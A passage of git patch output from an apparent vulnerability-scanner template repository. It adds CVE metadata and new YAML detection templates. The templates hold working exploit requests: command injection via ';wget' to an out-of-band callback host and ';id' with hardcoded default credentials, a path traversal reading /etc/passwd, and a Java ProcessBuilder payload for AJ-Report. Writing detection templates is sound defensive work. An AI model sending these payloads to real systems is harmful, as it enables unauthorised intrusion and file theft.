and may be used. VDB-249510 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0195.yaml"} {"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} {"ID":"CVE-2024-0235","Info":{"Name":"EventON (Free \u003c 2.2.8, Premium \u003c 4.5.5) - Information Disclosure","Severity":"medium","Description":"The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-0235.yaml"} @@ -2398,11 +2402,13 @@ {"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"} {"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} +{"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"} {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} +{"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 341b934c1f..a8bbfdcf41 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -6cee9d81045ba3fb25589784532a78e4 +2ecfbdb4298145f0427a7bc3f0ccd192 From 6e9f8f031ee7747918cd2592a8eab4100026608c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:55:10 +0000 Subject: [PATCH 1260/1768] Auto Template Signing [Thu May 23 12:55:10 UTC 2024] :robot: --- http/cves/2024/CVE-2024-0195.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index c458ad3cd3..0d421f8fc1 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -54,3 +54,4 @@ http: part: interactsh_protocol words: - "dns" +# digest: 4a0a004730450220745e8b365ef39550953f2e7c7ec479c97d618b53aca81aa2b4ca13122a21393e022100ca3f258bebf53fbde78835764d0418a8e96537a8c81731da03b8ef7429d65e6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9ac9c195d7202f840cc8ad216c0be88301fb17dd Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:27:16 +0530 Subject: [PATCH 1261/1768] Create netgear-boarddataww-rce.yaml --- http/iot/netgear-boarddataww-rce.yaml | 39 +++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/iot/netgear-boarddataww-rce.yaml diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml new file mode 100644 index 0000000000..c83be5cafd --- /dev/null +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -0,0 +1,39 @@ +id: netgear-boarddataww-rce + +info: + name: Netgear router boardDataWW.php - Remote Code Execution + author: pussycat0x + severity: high + description: | + There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash. + reference: + - https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: title=="Netgear" + tags: rce,netgear,iot + +http: + - raw: + - | + POST /boardDataWW.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "<title>Netgear" + + - type: status + status: + - 200 From 8f52a499a85f55e5a03933b95d673a35142ac6f2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:28:41 +0530 Subject: [PATCH 1262/1768] Create cerio-dt-rce.yaml --- http/vulnerabilities/other/cerio-dt-rce.yaml | 38 ++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/vulnerabilities/other/cerio-dt-rce.yaml diff --git a/http/vulnerabilities/other/cerio-dt-rce.yaml b/http/vulnerabilities/other/cerio-dt-rce.yaml new file mode 100644 index 0000000000..985d765643 --- /dev/null +++ b/http/vulnerabilities/other/cerio-dt-rce.yaml @@ -0,0 +1,38 @@ +id: cerio-dt-rce + +info: + name: CERIO-DT Save.cgi interface - Command Execution + author: pussycat0x + severity: critical + description: | + CERIO DT series routers have an operation command injection vulnerability in specific versions. An attacker could exploit this vulnerability to execute commands. + reference: + - https://github.com/20142995/sectool + - https://github.com/tanjiti/sec_profile + - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md + metadata: + fofa-query: title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N" + tags: cerio,rce + +http: + - raw: + - | + POST /cgi-bin/Save.cgi?cgi=PING HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic b3BlcmF0b3I6MTIzNA== + Content-Type: application/x-www-form-urlencoded + Content-Length: 33 + + pid=2061&ip=127.0.0.1;id×=1 + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + condition: and + + - type: status + status: + - 200 From b7d889fac5a456805a3225c3ab5741c0b3df7be4 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:29:44 +0530 Subject: [PATCH 1263/1768] Create array-vpn-lfi.yaml --- http/vulnerabilities/other/array-vpn-lfi.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/vulnerabilities/other/array-vpn-lfi.yaml diff --git a/http/vulnerabilities/other/array-vpn-lfi.yaml b/http/vulnerabilities/other/array-vpn-lfi.yaml new file mode 100644 index 0000000000..e8a1b14843 --- /dev/null +++ b/http/vulnerabilities/other/array-vpn-lfi.yaml @@ -0,0 +1,34 @@ +id: array-vpn-lfi + +info: + name: Array VPN - Arbitrary File Reading Vulnerability + author: pussycat0x + severity: high + description: | + Array VPN Arbitrary File Reading Vulnerability + reference: + - https://github.com/wy876/POC/blob/main/Array%20VPN%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: product="Array-VPN" + tags: lfi,vpn,arrayvpn + +http: + - raw: + - | + GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1 + Host: {{Hostname}} + Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 + Accept-Encoding: gzip, deflate + X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + condition: and + + - type: status + status: + - 200 From 623c041231ee7c97d48f9e64fe81781e22568903 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:31:42 +0530 Subject: [PATCH 1264/1768] Create aj-report-rce.yaml --- http/vulnerabilities/other/aj-report-rce.yaml | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/vulnerabilities/other/aj-report-rce.yaml diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/vulnerabilities/other/aj-report-rce.yaml new file mode 100644 index 0000000000..00fc980bbb --- /dev/null +++ b/http/vulnerabilities/other/aj-report-rce.yaml @@ -0,0 +1,42 @@ +id: aj-report-rce + +info: + name: AJ-Report Open Source Data Screen - Remote Code Execution + author: pussycat0x + severity: high + description: | + AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious. + reference: + - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: title="AJ-Report" + tags: aj-report,rce + +http: + - raw: + - | + POST /dataSetParam/verification;swagger-ui/ HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Content-Type: application/json;charset=UTF-8 + + {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "code" + - "data" + condition: and + + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + + - type: status + status: + - 200 From c2184ad85926fbce21aafdb70d96626821963b18 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:36:21 +0530 Subject: [PATCH 1265/1768] lint -fix --- http/vulnerabilities/other/aj-report-rce.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/vulnerabilities/other/aj-report-rce.yaml index 00fc980bbb..b7d313b260 100644 --- a/http/vulnerabilities/other/aj-report-rce.yaml +++ b/http/vulnerabilities/other/aj-report-rce.yaml @@ -22,7 +22,6 @@ http: {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} - matchers-condition: and matchers: - type: word From bb0465068ab2e918d687a5048056ef2a88005a61 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:43:24 +0530 Subject: [PATCH 1266/1768] Update aj-report-rce.yaml --- http/vulnerabilities/other/aj-report-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/vulnerabilities/other/aj-report-rce.yaml index b7d313b260..aa59ce8e6e 100644 --- a/http/vulnerabilities/other/aj-report-rce.yaml +++ b/http/vulnerabilities/other/aj-report-rce.yaml @@ -20,8 +20,8 @@ http: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Content-Type: application/json;charset=UTF-8 - {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} - + {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} + matchers-condition: and matchers: - type: word From 33854482cfbcca306cda6884bd6832bf9a38fe77 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 15:03:19 +0000 Subject: [PATCH 1267/1768] Auto Generated Templates Stats [Thu May 23 15:03:19 UTC 2024] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 10686 +++++++++++++++++++++-------------------- TOP-10.md | 20 +- 3 files changed, 5367 insertions(+), 5341 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 8da832e644..b1b1c7734c 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2474},{"name":"panel","count":1133},{"name":"wordpress","count":973},{"name":"exposure","count":908},{"name":"xss","count":904},{"name":"wp-plugin","count":844},{"name":"osint","count":804},{"name":"tech","count":674},{"name":"lfi","count":654},{"name":"misconfig","count":606},{"name":"edb","count":599},{"name":"rce","count":591},{"name":"packetstorm","count":530},{"name":"wpscan","count":495},{"name":"cve2021","count":491},{"name":"cve2022","count":476},{"name":"wp","count":419},{"name":"cve2023","count":364},{"name":"unauth","count":363},{"name":"sqli","count":352},{"name":"file","count":346},{"name":"authenticated","count":342},{"name":"intrusive","count":299},{"name":"kev","count":268},{"name":"detect","count":259},{"name":"login","count":259},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":221},{"name":"config","count":220},{"name":"top-200","count":215},{"name":"default-login","count":211},{"name":"osint-social","count":210},{"name":"network","count":194},{"name":"token","count":193},{"name":"","count":191},{"name":"apache","count":188},{"name":"devops","count":176},{"name":"cve2018","count":169},{"name":"iot","count":166},{"name":"cve2019","count":165},{"name":"keys","count":155},{"name":"joomla","count":148},{"name":"malware","count":142},{"name":"redirect","count":135},{"name":"aws","count":133},{"name":"cloud","count":132},{"name":"auth-bypass","count":129},{"name":"ssrf","count":119},{"name":"phishing","count":117},{"name":"amazon","count":116},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cms","count":110},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"install","count":107},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":89},{"name":"disclosure","count":89},{"name":"linux","count":83},{"name":"code","count":81},{"name":"local","count":80},{"name":"privesc","count":79},{"name":"takeover","count":79},{"name":"seclists","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":70},{"name":"oss","count":67},{"name":"cisco","count":66},{"name":"cve2024","count":63},{"name":"adobe","count":62},{"name":"js","count":62},{"name":"ir","count":61},{"name":"huntr","count":59},{"name":"cve2015","count":59},{"name":"cve2016","count":57},{"name":"atlassian","count":57},{"name":"vmware","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"enum","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"hackerone","count":46},{"name":"vulhub","count":46},{"name":"aem","count":45},{"name":"osint-gaming","count":45},{"name":"php","count":44},{"name":"jndi","count":44},{"name":"cve2014","count":44},{"name":"debug","count":44},{"name":"deserialization","count":43},{"name":"oa","count":42},{"name":"osint-hobby","count":42},{"name":"generic","count":42},{"name":"osint-porn","count":42},{"name":"plugin","count":42},{"name":"traversal","count":42},{"name":"springboot","count":41},{"name":"misc","count":39},{"name":"cnvd","count":39},{"name":"microsoft","count":38},{"name":"injection","count":38},{"name":"kubernetes","count":37},{"name":"jira","count":37},{"name":"listing","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"ssl","count":33},{"name":"fuzz","count":33},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"tls","count":30},{"name":"ec2","count":30},{"name":"wp-theme","count":29},{"name":"dlink","count":29},{"name":"api","count":28},{"name":"gitlab","count":28},{"name":"ssh","count":28},{"name":"k8s","count":28},{"name":"bestwebsoft","count":27},{"name":"fortinet","count":27},{"name":"citrix","count":27},{"name":"cve2012","count":26},{"name":"proxy","count":26},{"name":"firewall","count":25},{"name":"lfr","count":25},{"name":"manageengine","count":25},{"name":"zohocorp","count":25},{"name":"weaver","count":25},{"name":"dns","count":24},{"name":"zoho","count":24},{"name":"osint-finance","count":24},{"name":"admin","count":24},{"name":"osint-images","count":24},{"name":"osint-business","count":24},{"name":"osint-shopping","count":24},{"name":"yonyou","count":23},{"name":"tomcat","count":23},{"name":"file-upload","count":23},{"name":"stored-xss","count":23},{"name":"audit","count":23},{"name":"xxe","count":23},{"name":"prestashop","count":22},{"name":"cicd","count":22},{"name":"s3","count":22},{"name":"dast","count":21},{"name":"printer","count":21},{"name":"github","count":21},{"name":"msf","count":21},{"name":"ecology","count":21},{"name":"weblogic","count":21},{"name":"camera","count":20},{"name":"jenkins","count":20},{"name":"grafana","count":19},{"name":"ftp","count":19},{"name":"wavlink","count":19},{"name":"rukovoditel","count":19},{"name":"struts","count":19},{"name":"hp","count":19},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"osint-music","count":18},{"name":"cve2011","count":18},{"name":"coldfusion","count":18},{"name":"mail","count":17},{"name":"service","count":17},{"name":"nginx","count":17},{"name":"azure","count":17},{"name":"node.js","count":17},{"name":"confluence","count":17},{"name":"vpn","count":16},{"name":"magento","count":16},{"name":"backup","count":16},{"name":"status","count":16},{"name":"honeypot","count":16},{"name":"jarm","count":16},{"name":"alibaba","count":16},{"name":"osint-blog","count":16},{"name":"microweber","count":16},{"name":"cve2009","count":16},{"name":"rconfig","count":16},{"name":"dashboard","count":15},{"name":"cve2008","count":15},{"name":"zyxel","count":15},{"name":"cve2013","count":15},{"name":"seeyon","count":15},{"name":"bypass","count":15},{"name":"java","count":15},{"name":"ruby","count":15},{"name":"backdoor","count":15},{"name":"woocommerce","count":15},{"name":"nodejs","count":15},{"name":"cnvd2021","count":15},{"name":"tongda","count":15},{"name":"node","count":14},{"name":"npm","count":14},{"name":"rds","count":14},{"name":"auth","count":14},{"name":"setup","count":14},{"name":"osint-art","count":14},{"name":"windows","count":14},{"name":"smb","count":14},{"name":"dell","count":14},{"name":"domainmod","count":14},{"name":"login-check","count":14},{"name":"nagios","count":14},{"name":"redhat","count":14},{"name":"smtp","count":14},{"name":"redis","count":14},{"name":"osint-health","count":14},{"name":"docker","count":14},{"name":"ssti","count":14},{"name":"creds-stuffing","count":14},{"name":"git","count":14},{"name":"headless","count":14},{"name":"icewarp","count":14},{"name":"jboss","count":14},{"name":"moosocial","count":13},{"name":"mysql","count":13},{"name":"postgresql","count":13},{"name":"fortigate","count":13},{"name":"ivanti","count":13},{"name":"rails","count":13},{"name":"hashicorp","count":13},{"name":"graphql","count":13},{"name":"laravel","count":13},{"name":"abstractapi","count":13},{"name":"osint-political","count":13},{"name":"airflow","count":13},{"name":"netgear","count":13},{"name":"cuppacms","count":13},{"name":"osint-dating","count":13},{"name":"sonicwall","count":13},{"name":"cuppa","count":13},{"name":"drupal","count":12},{"name":"kafka","count":12},{"name":"zimbra","count":12},{"name":"webserver","count":12},{"name":"ofbiz","count":12},{"name":"doppler","count":12},{"name":"netsweeper","count":12},{"name":"newrelic","count":12},{"name":"vbulletin","count":12},{"name":"django","count":11},{"name":"fastjson","count":11},{"name":"iam","count":11},{"name":"online-fire-reporting","count":11},{"name":"hikvision","count":11},{"name":"installer","count":11},{"name":"info-leak","count":11},{"name":"cache","count":11},{"name":"xstream","count":11},{"name":"phpgurukul","count":11},{"name":"osint-video","count":11},{"name":"iis","count":11},{"name":"jolokia","count":11},{"name":"phpmyadmin","count":11},{"name":"jetbrains","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"spring","count":11},{"name":"prometheus","count":11},{"name":"elasticsearch","count":10},{"name":"thinkphp","count":10},{"name":"db","count":10},{"name":"glpi","count":10},{"name":"samsung","count":10},{"name":"symfony","count":10},{"name":"solr","count":10},{"name":"solarview","count":10},{"name":"dropbox","count":10},{"name":"digitalocean","count":10},{"name":"sitecore","count":10},{"name":"dedecms","count":10},{"name":"zabbix","count":10},{"name":"xstream_project","count":10},{"name":"druid","count":9},{"name":"lucee","count":9},{"name":"gitea","count":9},{"name":"dahua","count":9},{"name":"moodle","count":9},{"name":"wso2","count":9},{"name":"pfsense","count":9},{"name":"cnvd2020","count":9},{"name":"secret","count":9},{"name":"firebase","count":9},{"name":"exchange","count":9},{"name":"elastic","count":9},{"name":"facebook","count":9},{"name":"crlf","count":9},{"name":"cloudtrail","count":9},{"name":"python","count":9},{"name":"vcenter","count":9},{"name":"sangfor","count":9},{"name":"bitbucket","count":9},{"name":"progress","count":9},{"name":"artica","count":9},{"name":"opencats","count":9},{"name":"scada","count":9},{"name":"blind","count":9},{"name":"kube","count":9},{"name":"sophos","count":9},{"name":"versa","count":9},{"name":"ognl","count":8},{"name":"huawei","count":8},{"name":"mlflow","count":8},{"name":"manager","count":8},{"name":"config-audit","count":8},{"name":"wanhu","count":8},{"name":"emerge","count":8},{"name":"osint-news","count":8},{"name":"spotweb_project","count":8},{"name":"hms","count":8},{"name":"error","count":8},{"name":"odoo","count":8},{"name":"cloud-enum","count":8},{"name":"recon","count":8},{"name":"go","count":8},{"name":"oauth","count":8},{"name":"console","count":8},{"name":"atom","count":8},{"name":"cisco-switch","count":8},{"name":"metadata","count":8},{"name":"symantec","count":8},{"name":"phpjabbers","count":8},{"name":"spotweb","count":8},{"name":"bucket","count":8},{"name":"gateway","count":8},{"name":"phpinfo","count":8},{"name":"default-page","count":8},{"name":"unauthenticated","count":8},{"name":"mirai","count":8},{"name":"e-office","count":8},{"name":"discord","count":8},{"name":"exploitdb","count":7},{"name":"keking","count":7},{"name":"nacos","count":7},{"name":"nortekcontrol","count":7},{"name":"landray","count":7},{"name":"shopify","count":7},{"name":"nexus","count":7},{"name":"openemr","count":7},{"name":"teamcity","count":7},{"name":"bloofox","count":7},{"name":"database","count":7},{"name":"maps","count":7},{"name":"instrusive","count":7},{"name":"mongodb","count":7},{"name":"fortios","count":7},{"name":"bigip","count":7},{"name":"oos","count":7},{"name":"linkedin","count":7},{"name":"avtech","count":7},{"name":"filemanager","count":7},{"name":"rfi","count":7},{"name":"telesquare","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"ruckus","count":7},{"name":"solarwinds","count":7},{"name":"vms","count":7},{"name":"contec","count":7},{"name":"vpc","count":7},{"name":"activemq","count":7},{"name":"nagiosxi","count":7},{"name":"pmb","count":7},{"name":"gogs","count":7},{"name":"blockchain","count":7},{"name":"fpd","count":7},{"name":"websphere","count":7},{"name":"mobileiron","count":7},{"name":"cacti","count":7},{"name":"twitter","count":7},{"name":"moodating","count":7},{"name":"joomla\\!","count":7},{"name":"monstra","count":7},{"name":"f5","count":7},{"name":"slack","count":7},{"name":"squirrelmail","count":7},{"name":"opensis","count":7},{"name":"kubelet","count":6},{"name":"jetty","count":6},{"name":"tikiwiki","count":6},{"name":"microfocus","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"flutterwave","count":6},{"name":"doctor-appointment-system","count":6},{"name":"openvpn","count":6},{"name":"beyondtrust","count":6},{"name":"sonarqube","count":6},{"name":"gcp","count":6},{"name":"minio","count":6},{"name":"advantech","count":6},{"name":"couchdb","count":6},{"name":"zhiyuan","count":6},{"name":"cockpit","count":6},{"name":"74cms","count":6},{"name":"splunk","count":6},{"name":"server","count":6},{"name":"rat","count":6},{"name":"bmc","count":6},{"name":"paypal","count":6},{"name":"geoserver","count":6},{"name":"cobbler","count":6},{"name":"webmin","count":6},{"name":"log","count":6},{"name":"leak","count":6},{"name":"jeecg","count":6},{"name":"asp","count":6},{"name":"lfprojects","count":6},{"name":"vrealize","count":6},{"name":"express","count":6},{"name":"magmi","count":6},{"name":"plesk","count":6},{"name":"elfinder","count":6},{"name":"sql","count":6},{"name":"liferay","count":6},{"name":"servicenow","count":6},{"name":"typo3","count":6},{"name":"asus","count":6},{"name":"ldap","count":6},{"name":"chanjet","count":6},{"name":"synacor","count":6},{"name":"microstrategy","count":6},{"name":"keycloak","count":6},{"name":"jamf","count":6},{"name":"zzzcms","count":5},{"name":"mikrotik","count":5},{"name":"chamilo","count":5},{"name":"10web","count":5},{"name":"qnap","count":5},{"name":"rseenet","count":5},{"name":"web3","count":5},{"name":"webview","count":5},{"name":"firmware","count":5},{"name":"agentejo","count":5},{"name":"totolink","count":5},{"name":"caucho","count":5},{"name":"metinfo","count":5},{"name":"xmlrpc","count":5